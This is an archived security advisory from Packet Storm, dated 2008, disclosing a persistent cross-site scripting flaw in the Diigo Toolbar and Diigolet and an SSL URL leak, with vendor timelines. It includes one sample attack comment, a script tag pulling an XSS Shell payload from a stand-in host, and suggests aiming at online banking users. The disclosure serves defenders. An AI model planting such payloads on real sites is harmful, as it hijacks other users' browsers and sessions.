exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

diigo-xss.txt

diigo-xss.txt
Posted Jun 20, 2008
Authored by Ferruh Mavituna | Site ferruh.mavituna.com

Diigo Toolbar suffers from a global cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 21a323d1581282c52404d2bfe4aed45ed5fa7390089119deb2828f1987f77587

diigo-xss.txt

Change Mirror Download
Diigo Toolbar - Global XSS and Information Leakage in SSL URLs

== Global XSS ==
Diigo is (https://www.diigo.com/) a social bookmarking and sharing
application which allows users to see other users comments and notes
for every website. For this feature users should use Diigolet
bookmarklet or Diigo Toolbar - https://www.diigo.com/tools. These are
almost mandatory to use Diigo and almost all Diigo members have them
installed.

An attacker can do Cross-site Scripting in these public comments and
that comment will affect any other user of Diigo Toolbar and Diigolet
who visits the website. This means a Diigo user can backdoor any
website in the internet easily with a permanent XSS and any other
Diigo user who visits this website will be affected. Vulnerability
exists in:
* Diigo Toolbar for IE,
* Diigo Toolbar for FF,
* Diigolet for IE and FF,

These comments will be injected into the current domain context, thus
an attacker can execute a Javascript code in the target domain,
Target URL can be over SSL as well. All Diigo tools users are affected
from this vulnerability.

For an attacker this is a perfect opportunity to use some XSS bot
manager application such as XSS Shell, Also an attacker can attack
high profile websites such as online banking applications. Considering
you can search in shared bookmarks so you can actually people who uses
a certain online banking application.

Sample attack comment can be:
<script src="https://example.com/xssshell/"></script>


== Fix ==
Download latest version of Diigo Toolbar

== Disclosure Timeline ==
* 12 May 2008 - Vendor Informed
* 2 June 2008 - Another e-mail to vendor to check if they've fixed
* 3 June 2008 - Vendor informed me that it's fixed
* 20 June 2008 - Public Release


== Information Leakage in SSL URLs ==
Diigo toolbar is sending all SSL URLs to their servers over HTTP for
shared comment feature, which might cause to leak session_ids over URL
or any other sensitive information transferred over URL.


== Fix ==
User can not opt-out from this feature. There is no known fix, this
looks like considered as a feature not a bug.

== Disclosure Timeline ==
* 9 May 2008 - Vendor Informed, Couple of mail exchanged and I tried
to explain why this is bad, it didn't work.
* 12 May 2008 - Ask for an update, No response.
* 20 June 2008 - Public Release


--
Ferruh Mavituna
https://ferruh.mavituna.com

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close